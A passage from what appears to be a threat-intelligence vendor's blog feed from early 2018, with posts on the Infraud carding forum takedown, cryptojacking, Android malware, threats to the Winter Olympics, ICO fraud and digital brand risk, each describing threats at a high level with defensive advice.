    Between 2010 and 2018, the Infraud Forum switched to several different top level domains and attracted large numbers of members to the forum (Brian Krebs puts this number at almost 11,000).

    The reputation of the forum also grew; a vendor with a presence on Infraud would have added legitimacy.  Even some of the most reputable Automated Vending Carts (AVCs) – such as the popular site Joker’s Stash – sought a presence on the Infraud Forum (see below). While Infraud was not unique in this respect – Verified, Omerta, and Exploit are other examples of forums where vendors look to establish a reputation – it was certainly a significant player.


    Figure 6: Post by JokerStash on wtl[.]pw


    In order to facilitate these vendors, the forum had a specific section for vendors to advertise. Vendors like Unnicat, Dark4sys, and Deputat (all also named in the indictment) had a presence here.

    The site extended beyond being simply a collection of credit card vendors, with separate exchanger and escrow services also available. Users could access these services at different access levels, such as a VIP.


    Figure 7: A screenshot of Infraud[.]cc



    The Infraud Forum is another example of the level of professionalization that exists within the criminal underground. This forum was clearly highly hierarchical and relied on its extensive networks and reputation to make a lot of money.

    Many of the aliases disclosed in the indictment were at one point active across a host of different underground forums, including the AlphaBay forum. Although the full details of the law enforcement operation have not yet been released, it’s possible that the seizure of AlphaBay in 2017 provided valuable intelligence in this operation. Nevertheless, news that 36 prominent cybercriminals – who were active across several sites – have been closely monitored by international authorities will act as a further blow for the criminal community, which is still dealing with the impact of the AlphaBay and Hansa seizures.

    The impact of this announcement should be placed into context. It’s worth noting that of the 36 individuals named in the indictment, only 13 have been apprehended. Indeed, although the site infraud[.]wf appears to have been seized, some sites that were run by vendors on the Infraud Forum remain active such as d4rksys[.]cc (see Figure 8 below), a site allegedly run by dark3r. This is similarly the case for sites run by Unnicat and Debutat. This is a reminder that, although Infraud was a significant player, there are many more forums and AVCs in operation, and the closure of one site will mean criminal actors will migrate to other forums.


    Figure 8: A screenshot of d4rksys[.]cc, taken on 07 February 2018.

    Shifts within the criminal ecosystem

    Given the increased attention from law enforcement, it’s possible we will see more forums turning to new technologies to reduce the likelihood of domain seizure. Joker’s Stash has already moved its site hosting to a blockchain-based domain name system (DNS) provided by the cryptocurrency Emercoin. We’ve seen adverts demonstrating this change since around the end of September 2017, on multiple clear web carding forums.


    Figure 9: Joker’s Stash advert on carding forum with link and instructions to latest Blockchain DNS site


    The adverts direct users to a “Blockchain DNS” browser extension for Chrome and Firefox, which enable their users to connect to top level domains (TLDs) such as .bazar, .coin, .lib, .emc and others. Domains using these TLDs are not typically resolvable through generic browser configurations. As Emercoin’s domain name records are completely decentralized, they cannot be altered, revoked or suspended by any authority; only a record’s owner can modify or transfer it to another owner. The owners of Joker’s Stash therefore likely sought to avoid takedowns or other external disruption by moving to a blockchain solution.

    This is not the first example of threat actors using blockchain-based DNS. Both operators of the botnet Necurs and point of sale (PoS) malware Kasidet have used the Namecoin peer-to-peer network which has no central authority, likely in attempts to avoid law enforcement takedowns of their command and control (C2) infrastructure. For the owners of Joker’s Stash, the use of Emercoin’s DNS might trump traditional DNS for the same reasons, but it still requires visitors to take additional steps in order to visit the site and that might drive away some of its businesses. In the end, as with a lot of security, the benefits might come at the sacrifice of ease-of-use.


    No significant change anticipated

    Unfortunately, the reality is that this latest piece of news constitutes no real decrease in the threat posed to merchants, consumers and financial institutions from card fraud. Nevertheless, we will be keeping tabs on any changes that occur from these latest arrests, as the cybercriminal community bounces back from another setback. To find out more about the underground carding ecosystem, download a copy of our previous research report, Inside Online Carding Courses Designed for Cybercriminals.


    To get the latest threat intelligence news and research, subscribe to our email list here.

    Cryptojacking: An Overview Tue, 13 Feb 2018 17:59:17 +0000 What is Cryptojacking?

    Cryptojacking is the process of hijacking someone else’s browser to mine cryptocurrencies with their computer processing power. There are several pieces of software available that do this, including Coinhive, Authedmine and Crypto-Loot. While such tools are not necessarily illegal, the stealth and lack of user consent associated with them has led many to view crypto jacking software as malware; the security firm Malwarebytes, for example, has blocked coinhive[.]com.

    This week it was announced that a number of government websites, including the NHS, had been serving cryptojacking malware, meaning that visitors had been unknowingly mining cryptocurrency.


    Monero mining is big business; browsers, extensions and mobile apps have all reportedly spread Coinhive in the past few months. Coinhive is a Javascript miner for Monero, a cryptocurrency that has been steadily growing in popularity since 2014. In January 2018, a proof of concept called CoffeeMiner was released, which allows actors to access public Wi-Fi networks and mine cryptocurrencies.

    More recently, a malvertising campaign targeted Google’s DoubleClick advertising tool to compromise adverts and distribute Coinhive. The sharp increase in use of Coinhive miners correlated to an increase in traffic to five malicious domains, which was subsequently linked back to DoubleClick advertisements.

    Crypto Jacker: A New WordPress Plugin

    A new product called Crypto Jacker looks combine Coinhive, Authedmine and Crypto-Loot and incorporate these into a WordPress plugin with added Search Engine Optimization (SEO) functionality. The domain cryptojacker[.]co was registered on November 30th, 2017 and seeks to sell a one-time version of the Crypto Jacker software for $29. With the software purchased, users can install Crypto Jacker on an unlimited number of their domains.


    Figure 1: The Crypto Jacker software


    Crypto Jacker “provides a way to earn crypto currency from people who visit your links, even when you’re sharing other websites that you don’t own. We even cloak your website links for your (sic.) so they look like the original shares on social media.” This is done by using an iframe to clone content from popular website, as shown in Figure 2.

    Figure 2: The user interface of the Crypto Jacker plug-in

    There are a couple of things Crypto Jacker does to increase traffic to the site.

    1. Users can load the Meta Data from the destination url, making it feature highly in search engine rankings.
    2. “Social Cloaking” (as Shown in Figure 3) makes the imitation link appear to be from the original destination source, increasing the likelihood of clicks.

    Figure 3: Crypto Jacker’s “social cloaking” demonstration video

    It’s unsurprising that Crypto Jacker has these SEO features, given other pieces of software under the name Thomas Witek (the author of Crypto Jacker) include “Click Jacker”, “Link Cloaker”, and “Gram Poster”. This shift in the business model to focus on cryptocurrency mining instead of advertising is explicitly referenced on the website: “advertising on the web is difficult to profit from….why shouldn’t you mine crypto coins.” This is part a broader shift towards cryptocurrency fraud by a variety of actors that we have provided a more detailed analysis of in our recent research report, The New Gold Rush: Cryptocurrencies are the New Frontier of Fraud.

    Scam or Legitimate?

    Is this a scam? It’s possible that Crypto Jacker is a ruse to cash in on web developers’ interest in cryptocurrency mining. This review questions the nature of the site itself.

    Our own tests of the demo website (paidallday[.]com/what-you-need-to-know-about-bitcoin), shown on the Crypto Jacker website, shows that cryptocurrency mining is likely taking place. As shown in Figure 4, the website appeared to have the plugin “cj-plugin”, which launched the “” script. When we visited the site, CPU usage increased significantly to 50% (as shown in Figure 5). While this does not confirm the Crypto Jacker product is legitimate, it does add some credibility to their claim.

    Figure 4: The source code of paidallday[.]com/what-you-need-to-know-about-bitcoin, a demo website shown in Crypto Jacker videos

    Figure 5: CPU usage peaking at the time of the visit to the website

    Interest in cryptocurrencies shows no sign of slowing down and, while Crypto Jacker does not appear to have developed a large user base, its emergence – if legitimate – is an attempt to lower the barrier to entry for those looking to use stealthy cryptocurrency mining software.

    Protect yourself from Crypto mining

    1. Have a reputable ad blocker

    Organizations that do not wish to be “crypto jacked” and inadvertently mine cryptocurrency should ensure they have a reputable ad blocker in place. Consider ad blockers such as AdBlock, AdBlock Plus, 1Blocker, and UBlock. The NoCoin browser extension was also developed to block coin miners such as Coinhive.

    2. Apply patches to known vulnerabilities

    Organizations should apply patches and mitigation to known vulnerabilities as these can be used to deliver crypto miners. In December 2017 PyCryptoMiner, for example, began exploiting a vulnerability affecting JBoss servers that was first discovered in October. More recently, a Struts server exploit has been used for Monero mining. Sites such as the US CERT, the National Vulnerability Database and MITRE can provide the latest information on newly disclosed vulnerabilities. Red Hat Software provided mitigation advice for the JBoss vulnerability exploited by PyCryptoMiner. Patches for the Struts vulnerabilities are also available.


    Download our latest research paper The New Gold Rush: Cryptocurrencies are the New Frontier of Fraud to learn more about cryptocurrency fraud, and ways to protect against.


    To get the latest threat intelligence news and research, subscribe to our email list here.

    Shadow Talk Update – 12.02.2018 Mon, 12 Feb 2018 15:23:39 +0000 With the 2018 Winter Games beginning this week, the Digital Shadows Research Team focused on threats to those traveling to South Korea in this episode of Shadow Talk. There was also a roundup of the most recent cyber security news.

    Malware in Winter Olympics spearphishing campaign identified

    Anti-virus security company McAfee published a report detailing four variants of malware linked to the targeting of organizations associated with the XXIII Winter Games in South Korea. The variants were identified as “Gold Dragon”, “Brave Prince”, “Ghost419” and “RunningRat”. During the games themselves, we expect there to be a rise in cybercriminal activity, achieved through point of sale malware infections at hospitality, leisure and retail locations, ATM skimming, banking fraud and scam emails. VIPs travelling to the event are advised to use alternative forms of payment like chip and pin, pre-paid and pre-capped cards. Travellers should also opt for Virtual Private Network (VPN) tunnelling when connecting to company networks and corporate accounts, especially on public Wi-Fi.


    Operation Pzchao: not your typical espionage campaign

    The espionage-driven campaign Operation Pzchao has affected multiple entities across government, technology, education and telecommunications in North America, Russia, Oceania and Asia since 2016. Victims received emails containing a Visual Basic Script (VBScript) file, which retrieved second-stage payloads: a Bitcoin mining application, the credential harvester “Mimikatz”, and variants of the “Gh0st” remote-access trojan (RAT). Digital Shadows analysts casted doubt on the reported attributions to a Chinese state-linked advanced persistent threat (APT) group — the use of a Bitcoin miner, inconsistencies in the reported distribution method and use of a widespread RAT tool with no additional custom malware are not typical of a highly coordinated, state-linked group.


    Adobe zero-day vulnerability exploited in attacks against South Koreans

    The South Korean Computer Emergency Response Team (CERT) warned that a critical Adobe vulnerability was exploited in attacks targeting South Koreans involved in geopolitical research. Spearphishing emails were the only known vector of the attacks, which were attributed to a North Korean threat group. The emails distributed a variant of the “ROKRAT” trojan, which has reconnaissance and information-stealing capabilities. Adobe has issued security updates for the vulnerability, identified as CVE-2018-4878. Further exploitation attempts of this flaw are highly likely.


    Denial of service vulnerability discovered in WordPress platform

    A vulnerability identified in the WordPress online publishing platform could enable an attacker to conduct denial of service attacks. The researcher who identified the flaw claimed that requests for large JavaScript or Cascading Style Sheet files could be sent repeatedly to sites, resulting in the denial of legitimate traffic. WordPress has indicated it does not plan to patch the flaw, although exploitation of this vulnerability could potentially reverse this decision. The researcher released POC code; and secondary reporting suggested a small number of exploitation attempts had been detected. Further attempts are considered highly likely to occur.


    United States authorities charge 36 individuals allegedly behind the ‘Infraud’ cybercrime forum

    On Wednesday 7 February, the U.S. Department of Justice unveiled an indictment from 31 October 2017 against 36 individuals associated with the Infraud carding forum. This was a result of an operation known as “Shadow Web”. Although Infraud was a significant player in the carding ecosystem, there are still many more forums and Automated Vending in operation, and the closure of one site will mean criminal actors will migrate to other forums. Therefore, the threat posed to organizations by carding fraud remains the same. Our research also indicated that some sites that were run by vendors on the Infraud Forum are still active.

    Listen to this week’s podcast episode here:

    Subscribe to our weekly newsletter to get the latest podcast and other research by Digital Shadows.

    2017 Android malware in review: 4 key takeaways Thu, 08 Feb 2018 18:25:34 +0000 Android mobile devices were an attractive target for malicious activity throughout 2017. The ubiquity of these devices, and the sensitive data they often hold, enticed both espionage and financially motivated attackers. In 2017, we reported on 48 separate campaigns that targeted mobile applications and vulnerabilities. Our research highlighted the following key takeaways from the past year:

    1. Official app stores are not infallible

    Google Play was the most frequently cited single-source of Android malware infections. Despite the security measures put in place, the official Google Play store can still be used to distribute malicious applications; and given its popularity, criminal actors will continue to target it as a means of distributing malicious apps.

    However, 66% of reported initial infections were from locations other than the official app store. Google Play’s profile can also slightly skew public reporting of Android malware infections, as security researchers will often focus on identifying security weaknesses on the most well-known platforms ahead of other, third-party sites. The number of infection entry points outside of app stores should remind us to remain vigilant of phishing texts and emails, and to take added precautions when browsing on mobile devices.


    Figure 1 Reported initial infection points for mobile malware since January 1st 2017 (unknown omitted)


    2. Appearances can be deceiving

    Attackers predominantly used two variations of malicious apps to disguise malware and push downloads; apps either a) acted as legitimate resources such as cryptocurrency, security and games services, or b) fraudulently used branding associated with credible organizations, like Chrome or Adobe.

    Once installed, malware used a variety of methods to obtain device or user information, including requesting that the user accepts unnecessary permissions and escalating administrative privileges. Where user interaction was required to harvest data, overlays – where a malicious app superimposes over a legitimate app – were commonly deployed to prompt users to enter personal and financial information.

    These Android malware deployments included both opportunistic campaigns where users inadvertently downloaded malicious apps from a given site, as well as more targeted social engineering campaigns, such as those targeting users based in a particular country or industry.


    Figure 2 Reported techniques, tactics and procedures in Android incidents since January 1st 2017


    3. Espionage and financial gain were the primary motives

    Gathering information, such as profiling device information or recording phone calls and messages, was the most prevalent reason for infection. Collecting financial and banking data came a close second. Mobile banking malware uses sophisticated techniques for harvesting data, including overlays specific to target banks, and intercepting SMS messages to obtain multi-factor authentication codes.

    Given the increase in reports of cryptocurrency mining malware in 2018, which is partly a result of the steep rise in cryptocurrency prices, there is a realistic possibility that more Android malware attacks will incorporate cryptocurrency mining payloads in future.


    Figure 3   Reported function of mobile malware since January 1st 2017

    4. How to avoid infection

    We expect malware campaigns against the Android platform to continue in 2018; nevertheless, enterprises and individuals can take several preventative measures to lower the risk of infection:

    • Use the official Google Play store; only download “Play Protect verified” apps from legitimate companies
    • Only allow limited permissions for downloaded apps
    • For enterprise devices, Mobile Device Management solutions give IT security staff control to set access permissions and restrictions
    • Do not root enterprise devices, as rooting allows access to the Android operating system code. Preventing rooting mitigates unauthorized administration privilege access.
    • Deploy end-point Antivirus solutions on individual devices
    • Bring Your Own Device (BYOD) enterprises should establish user policies and disallow connection of BYOD to corporate infrastructure.
    • Educate employees on threats associated with SMS phishing and mobile device browsing

    Subscribe here to get the latest threat intelligence and more from Digital Shadows in your inbox.

    Phishing for Gold: Threats to the 2018 Winter Games Tue, 06 Feb 2018 14:12:22 +0000 Digital Shadows has been monitoring major sporting events since 2014, beginning with the Winter Olympics in Sochi, Russia, and then the 2014 World Cup in Brazil. The 2016 Olympics, held in Rio de Janeiro were a hotbed of cyber activity, dominated by the OpOlympicHacking campaign, physical protests, and high levels of cybercrime against attendees. Rio shows that cyber actors look to profit from the millions of visitors, global media audience and increased number of financial transactions that accompany major sporting events.

    Although hacktivist and physical protest activity often accompany events with international media coverage, we believe cyber crime and fraud will be the most imminent and prevalent threats to the 2018 Olympic event and its attendees. Rio was also significant as it highlighted how actors working with the approval or on behalf of nation-states can use the cover of global sporting events for their own goals. In 2018, regional tensions between North and South Korea may well contribute to nation-state cyber operations, although it’s unclear how the recent public overtures between the two states and the decision to invite North Korean athletes to the event will affect this.

    As millions of fans descend on South Korea, particularly business and political VIPs, we believe the event will likely be targeted by a variety of cyber actors. This includes financially motivated cyber-criminals and more capable nation state actors – possibly as a dry-run for campaigns during the larger 2018 World Cup to be hosted later this year in Russia.


    The Games Have Already Begun

    We have already reported on data leaks and phishing attempts targeting organizers and affiliates of the Winter Olympics. As well as this, our SearchLight platform found several potentially malicious domains, social media accounts and infrastructural issues that could be used in future attacks.

    Both in the lead up and during the event, we expect to see:

    • Phishing – As well as targeting volunteers, attackers will use interest in the event as a lure when sending malicious phishing emails. We discovered several typo-squat domains that use the 2018 Winter Olympics and World Anti-Doping Agency (WADA) brand names. These domains were not registered to official entities, and over half were registered in Russia and Ukraine or behind proxy services. Although not currently used in active campaigns, these domains could be used in phishing attacks to distribute malware or harvest credentials.

    Selection of typo-squat domains discovered by Digital Shadows


    • Exposed credentials. We searched for examples of exposed credentials belonging to Olympic and WADA accounts in our repository of third party breaches. Here we found at least 300 examples of Olympic or WADA credential pairs in multiple breached datasets that became public in the last 12 months. These credentials could be used for further cyber-attacks against Olympic organizations, including spear-phishing and account takeover.


    Selection of exposed credentials for Olympic and WADA domains in breaches found by Digital Shadows

    • Data Leaks. In January, the Fancy Bears group – a self-proclaimed hacktivist group believed to be affiliated to the Russian state – published emails from the International Olympics Committee and International Luge Federation, likely in retaliation to the banning of Russian athletes for alleged doping controversies. On January 31, they published further information implicating Canadian athletes. “Fancy Bears” is a play on the widely used name “Fancy Bear” (APT-28), which is refers to an espionage group that the US intelligence community has linked to the Russian intelligence services. It is still unclear whether the two groups are one and the same; nevertheless, data leaks against WADA and the International Olympic Committee have been conducted under the Fancy Bear name since Rio in 2016.

    Fancy Bears announce leak of documents belonging to Canadian athletes via Twitter

    • Malware attacks. 2018 Olympic volunteers were targeted by macro-malware through email attachments imitating genuine documentation from the official 2018 Winter Olympics website. The original contained logistics details for the volunteers, suggesting the malware was aimed at either the volunteers themselves, or the volunteer portal. More recently, a data-gathering malware known as GoldDragon was identified targeting organizations associated with the 2018 Winter Olympics. In this case, the payloads were designed to establish persistence on targeted machines and enable further data exfiltration, as well as provide an ability to download additional malware.
    • Attacks on Wi-Fi network users. Attackers have previously compromised public Wi-Fi networks when going after high-value targets. The campaign known as DarkHotel, for example, used spoofed software updates on infected Wi-Fi networks targeting hotels in Asia, while APT-28 used credentials likely stolen from Wi-Fi networks in hotels to deploy remote access malware that could steal information and allow for lateral movement across networks.
    • Financial cybercrime. Criminals will often try and exploit the large number of visitors and increase in financial transactions, particularly in  areas  of  high  tourist  density  such  as  city  centers,  hotels,  restaurants  and  shopping  For example, between March and July 2017, over 41 Hyatt Hotel locations in 11 countries were compromised, resulting in the compromise of customer payment card details. 18 of the affected hotels were in China, but branches in South Korea, Japan, North and South America were also impacted. As well as an increase in payment card theft through point of sale malware infections at hospitality, leisure and retail locations, expect a rise in ATM skimming, banking fraud and scam emails.


    Visualizing the Threat

    Below is a visualized form of the expected threat landscape of the upcoming event. It breaks down potential targets for the Winter Olympics and presents some of the most likely risks for each.



    Podium Finish

    The 2018 Winter Olympics is expected to be a focal point of criminal and politically-charged cyber activity, as seen in previous similar events. The following mitigation techniques can help limit the impact of the malicious activity that will likely occur:

    • Update and patch. First and foremost, organizations should make sure their firmware and OS systems are updated with the latest patches, especially Microsoft applications.
    • Be wary of scams and phishing emails. Do not click on any links in emails marketing or referencing the event. The IOC will not be launching an email marketing campaign with “FREE TICKETS!!1!” and any claimed scandals pertaining to athletes can be found on trusted news media sites, not in any “YOU WON’T BELIEVE HOW THIS ATHELETE WON 20 GOLD MEDALS, CLICK HERE TO FIND OUT” emails.
    • When downloading applications, make sure you only initiate these from legitimate sites such as the Apple and Google stores. Also ensure you review security and access permissions granted to these programs. In November 2017 it was discovered that Android malware previously used by the Lazarus Group – an actor affiliated to the North Korean state – had been used to target the general public in South Korea.
    • Be vigilant when using ATMs in-country. Look out for evidence of machine tampering: some skimming device can be spotted by a quick wiggle of the card reader or through visible marks on the PIN code area. To help lessen the impact of Point of Sale malware and ATM skimming, alternative forms of payment like chip and pin, pre-paid and pre-capped cards should be considered.
    • Avoid untrusted networks. Corporate users should use Virtual Private Network (VPN) tunnelling when connecting to company networks and corporate accounts, especially on public Wi-Fi. Multi-Factor authentication can also help combat successful account compromises.
    • Protect VIPs. High-value employees traveling to the event should consider having their technology and devices placed in isolated corporate networks preceding and during the event. Following the event, a quarantine period could also be established to ensure nothing malicious has been brought back into the corporate network.

    Subscribe here to get the latest threat intelligence and more from Digital Shadows in your inbox. 

    Shadow Talk Update – 02.05.2018 Mon, 05 Feb 2018 15:26:46 +0000 In this week’s podcast episode of Shadow Talk, the Digital Shadows Research Team covered a range of activity. Here’s a quick roundup.


    In-development malware samples observed targeting Spectre and Meltdown

    Researchers reportedly detected malware samples designed to exploit the Spectre and Meltdown vulnerabilities. The samples appeared to be in development and were not actively exploiting the flaws. Though these samples may have been designed for exploitation purposes, there were still no detected samples accomplishing this activity. It is likely that Spectre and Meltdown exploits will continue to be developed into the near future.


    Japanese cryptocurrency stolen in huge cyber-heist

    On January 26, 2018 the Japan-based cryptocurrency exchange Coincheck suffered a large-scale cyber-heist. Attackers reportedly stole 58 billion Japanese yen’s ($530 million) worth of NEM, a peer-to-peer cryptocurrency established in 2015. Coincheck announced it will reimburse most of the stolen funds to its 260,000 affected customers. As the technology and security framework supporting digital currencies expands attackers will likely look for vulnerabilities, such as exchange platforms where digital “hot” wallets are connected to the internet. The consistently high value and increased availability of cryptocurrencies means threat actors will likely target them regularly this year.


    Dutch banks suffer DDoS attacks

    On 29 January 2018 financial institution Rabobank became the latest Dutch company to announce it had been affected by a distributed denial of service (DDoS) attack. Public reporting has been largely speculative, preventing independent assessment of the attacks. The botnet associated with the attacks has not been detected in other DDoS activities, and the size of the attacks (40Gbps) was relatively small, if accurately reported. Some media outlets linked the attacks to Russia, claiming they were retribution for recent reports of Dutch intelligence agencies infiltrating the Russia-linked group “APT-29” (Cozy Bear).


    Anonymous collective announces new phase of OpCatalunya

    On 29 January 2018 AnonPlus announced a new phase of OpCatalunya, the Anonymous operation supporting Catalan independence. OpCatalunyaNew has so far caused many DDoS claims and affected several Spanish companies across a variety of sectors. The catalyst may likely have been a Spanish Constitutional Court ruling on the investiture of regional president Carlos Puigdemont, an independence supporter. The coordination of the new campaign by small groups indicates the growing split in the Anonymous collective and has enabled operations to gain longevity and consistency of targeting.


    Severe RCE vulnerability in Cisco ASA devices

    Cisco released software updates addressing a remote code execution (RCE) vulnerability affecting Cisco Adaptive Security Appliance (ASA) software. There has been no proof of concept exploit code identified at the time of writing for vulnerability CVE-2018-0101, nor any reports of exploitation by threat actors. However, as RCE vulnerabilities are attractive to threat actors, exploitations are a realistic possibility in the next three months to a year. Cisco provided list of affected products, as well as details on how to identify vulnerable software versions.

    Listen to this week’s podcast episode here:

    Subscribe to our weekly newsletter to get the latest podcast and other research by Digital Shadows.

    Four Ways Criminals Are Exploiting Interest in Initial Coin Offerings Thu, 01 Feb 2018 13:43:00 +0000 Initial Coin Offerings (ICOs) are a way of crowdfunding cryptocurrencies and cryptocurrency platforms. By the end of 2017, almost $4 billion was raised in this way. However, as consumers rush to be the first to invest in a promising new cryptocurrency or platform, their investments can instead go into the account of criminals. These criminals seek make their money in four main ways:

    • Targeting genuine cryptocurrency platforms
    • Exit scams
    • Imitating or spoofing cryptocurrency platforms
    • Price manipulation

    This is only one aspect of cryptocurrency fraud, but you can learn more in our latest research paper, The New Gold Rush: Cryptocurrencies are the New Frontier of Fraud.


    Targeting Genuine Cryptocurrency Platforms

    At the end of January, a Japanese cryptocurrency exchange platform called Coincheck announced the theft of over $500m in NEM. The cryptocurrency NEM has since stated that attackers targeted a vulnerable wallet that had not used the currency’s available security features. $530 million surpasses the record set by Mt Gox in 2014.

    Targeting these platforms doesn’t have to be complex. In July 2017, criminals compromised the CoinDash website, replacing the initial Ethereum address to one controlled by the attacker. This new address received at least 2,314 payments from prospective CoinDash investors, totaling over 40,000 Ether. Over $7 million in Ethereum had been transferred to the fake address by the time CoinDash noticed the issue and suspended the ICO.


    Figure 1: Attacker’s Ether wallet during CoinDash ICO in July 2017


    More recently, the Initial Coin Offering for blockchain application company Experty was targeted by actors who sent phishing emails to potential coin buyers, prompting them to send funds to an attacker-owned wallet in return for a 33% bonus. The attacker’s wallet reached about 125 Ether ($125,000). We’ll be digging into approaches to phishing and account takeover against cryptocurrency holders in a future blog.


    Exit scams

    An exit scam refers to those cryptocurrency or platforms that are established with the plan to attract many customers before disappearing and stealing all the funds. There have been a host of exit scams in 2017 and 2018, including Confido, Benebit and Plexcoin.

    This week, the US Securities and Exchange Commission (SEC) claimed to have shut down an alleged Initial Coin Offering scam by AriseBank. The site claims to have raised over $600 million of their $1 billion goal. The SEC determined that AriseBank had violated security regulations as they were selling financial products that required the firm be registered with the SEC. While the SEC has put a concerted effort into identifying and assessing potentially fraudulent ICOs, the sheer number of new cryptocurrency products and platforms means exit scams will likely continue for some time.


    Spoofing Cryptocurrency Platforms

    Rather than create their own new cryptocurrency, criminals can also impersonate existing platforms. A recent example is the announcement that Telegram would be launching its own coin, which has led to a host of different spoof domains hoping to lure unsuspecting consumers into investing on the wrong platform. Despite Telegram stating that any announcement would be first done on Telegram, this has not stopped the creation of several spoof sites. Grampreico[.]com (shown below) is one such example, making $2000 to date.

    Figure 3: Grampreico[.]com claiming to be the initial coin offering for “Gram” token

    A different, though similar, approach is to register a similar looking domain and clone the contents of the target website. Myetherwallet[.]uk[.]com is a good example of a spoof site, a site that offers the ability to access your wallet through providing them with your private key.

    Figure 4: Spoof site for myetherwallet[.]com


    Cryptocurrency Price Manipulation

    Just as traders illegally inflate prices of stock in the real world, so too do groups of cybercriminals. This technique is known as “pump and dump”, and several online groups exist to inflate the price of smaller, less well-known currencies in order to cash in on the increase in value.

    Figure 5 shows the process followed by one Discord “pump” group, describing how they first “spread great news on twitter and Reddit”, before “mass retweet, like and react on the tweet”.

    Figure 5: A description of how “pump and dump” works, as described in one Pump and Dump Discord group


    Questions to Ask Yourself Before Investing in an ICO

    ICOs can be a great way for consumers to identify promising coins and platforms early on and profit from their rise. However, potential investors should be wary of sites or seller with unsolicited offers, or coins that guarantee high returns without solid justification. Three questions you can ask yourself are:

    1. Does the coin you are looking to invest in have an active online community with engaged developers?
    2. Have other online users reported the coin as a scam?
    3. Does the coin’s documentation hide behind marketing jargon that makes no effort to explain the technical aspects?

    For those that do invest, make sure you have strong password hygiene and make use of multifactor authentication to secure your accounts.

    To learn about other tactics, including account takeover and crypto jacking, download a copy of our research paper, The New Gold Rush: Cryptocurrencies are the New Frontier of Fraud or listen to our podcast below:

    Subscribe to our weekly newsletter to get the latest podcast and other research by Digital Shadows.

    Why Marketing Leaders Must Take Action To Manage Digital Risk And Protect Their Brand Tue, 30 Jan 2018 14:14:20 +0000 I am one of you. I have been in the marketing field for more than 20 years and have seen unimaginable technology shifts that have made the world a more connected and efficient digital machine. We can now engage digitally with consumers around the globe on so many screens (watch, mobile, tablet, laptop, desktop, TV, automobile, etc), at any place and at any time. The companies we work for have greatly benefited from this new digital age. We now have data everywhere, including customers, employees, and third party data on all kinds of devices, on premise and in the cloud. Combine these two digital shifts and we have an amazing opportunity as marketers to engage in a personal way with our customers like never before. With this great opportunity, there also comes great risk if your company is not protecting itself from digital risks.

    Everyone knows about the brands that have been breached. You read about it in the headlines almost daily that another brand has been breached and the data belonging to hundreds of millions of customers and employees has been stolen. Breaches have become so common that we are all getting tired of hearing about it. Many of the breaches occur due to phishing and social engineering; making use of malicious websites, fake social media profiles, and fake mobile applications to trick customers and employees to unknowingly hand over their personal data and log-in credentials. This data is then used for profit by the attackers or sold on the open, deep, and dark web for others to do what they will. It impacts everyone including the company, the brand, customers, third parties, employees, you, me, and even our kids.

    As marketing leaders, we are all brand stewards for our company and our customers. We need to do everything we can to make our customers love us and trust us. We could do 99.999% of things right, but with one simple “We’ve been hacked” experience, it could wreck it all. That is why we must play an active role working with our security team and be proactive in managing digital risk to protect the brand. As I have learned over the years, the best way to help customers and businesses is to tell them real customer stories that they can relate to as they share the same pain and concerns. I am about to share some real customer stories with you. These stories are really important as many of you, your brand, and your customers may be impacted by these same issues. Here are some customer stories that are 100% real that every marketing leader should know about as these digital risks are your risks.

    1. We found malicious website domains that look like the real brand:

    By monitoring for registrations of domains that appear to look similar to a well-known brand’s website, a spoof domain was discovered. The domain had been registered overnight, swapping a “rn” for an “m” so it looked exactly like the brands .com website. The content was an exact mirror of the client’s legitimate site and, aside from lacking some functionality of the legitimate site, appeared genuine to the casual user. The goal of the fake website was to fool unsuspecting users into entering in their usernames and passwords. The attackers could then use these credentials to login as the customer, take over their account and drain their funds resulting in upset customers who have had their money stolen and ultimately hold your brand accountable. Brand damage successful.

    The good news is with effective Digital Risk Management, you can identify these fake websites, and take them down before fraud is conducted against your customers.

    Malicious website domain detected

    Example: Malicious website domain detected, impact, recommended action, and takedown.

    2. Fake social media profiles that are indistinguishable from your real brand:

    By monitoring social media profiles for a very large customer, we discovered that more than 500 fake social media profiles that were hijacking their brand. Some of the profiles looked so legitimate, that the company was amazed by how close the cyber criminals came to replicating their legitimate social media site that even some employees could not determine if it was real or not. Cyber criminals used these fake profiles to sell counterfeit products, steal credit cards as well as credentials. Brand Damage Successful.

    The good news is with effective Digital Risk Management, fake social media profiles can be quickly identified and taken offline.

    Fake social media profile example

    3. Your customers unknowingly using fake mobile applications taking advantage of their privacy:

    By monitoring official app stores including the Apple Store or the Android Market as well as and third party app stores for references to the company’s branding, a malicious app impersonating their brand was detected. Analysis of this malicious app revealed that it had spyware capabilities and could steal information from its users. It could steal data ranging from sensitive documents to login credentials. Brand Damage Successful.

    The good news is that with effective digital risk management, the company was provided with an overview of the risks associated with the mobile application, screenshots of the application, and critically the ability to have the malicious app removed from the store.

    Fake Mobile App Detected

    Example: Fake Mobile App detected, impact, recommended action, and takedown

    These are just three real stories that had the potential to impact consumers and the brands they trust. There are hundreds more examples of brand exposure that you as a marketing leader must learn more about. You can also read up on additional brand exposure use cases here. Earlier, I asked you to listen to these stories as these same stories could be happening to your customers, putting your brand at risk. It is not my intention to scare you but to educate you on what is going on right now, today, this very minute.

    This is why as marketing leaders, we must take action to work with our security team to manage digital risk and protect our brand. By considering the security implications of phishing sites and social media, security shifts from an IT function to a company-wide concern. If you take action, you can minimize the impact of a hack or stop it before it effects your customers and your brand.

    Interested in learning more about protecting your brand from digital risks and the dark web? Join our webinar with FitBit on Brand Protection.

    Subscribe here to get the latest threat intelligence and more from Digital Shadows in your inbox. 

    Dan Lowden
    CMO, Digital Shadows

    Dan Lowden has more than 20 years of executive-level experience in technology marketing. He has successfully driven demand generation and brand leadership for large enterprises and startups in security, mobile computing, wireless services, enterprise software, and cloud. Previously Dan was Chief Marketing Officer at Invincea, a machine learning next-gen antivirus company that was recently acquired by Sophos. Prior to that, he was VP of Marketing at vArmour, a leading data center and cloud security company. Previous roles also include VP of Marketing at Digby (acquired by Phunware), and VP of Marketing and Business Development at Wayport (acquired by AT&T). In addition, he has held marketing leadership positions at IBM, NEC, and Sharp Electronics. Dan holds a Bachelor of Science in Finance from Rider University and an MBA in International Business from Rutgers Graduate School of Management.

    Shadow Talk Update – 01.29.2018 Mon, 29 Jan 2018 18:38:43 +0000 In this week’s Shadow Talk podcast episode, the Digital Shadows Research Team covered a range of activity. Here’s a quick roundup.

    Dark Caracal Infiltrates Devices for Espionage

